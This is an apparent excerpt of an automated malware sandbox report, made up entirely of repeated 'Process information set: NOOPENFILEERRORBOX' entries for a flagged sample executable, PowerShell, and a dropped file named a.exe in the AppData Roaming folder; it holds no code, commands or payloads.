                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
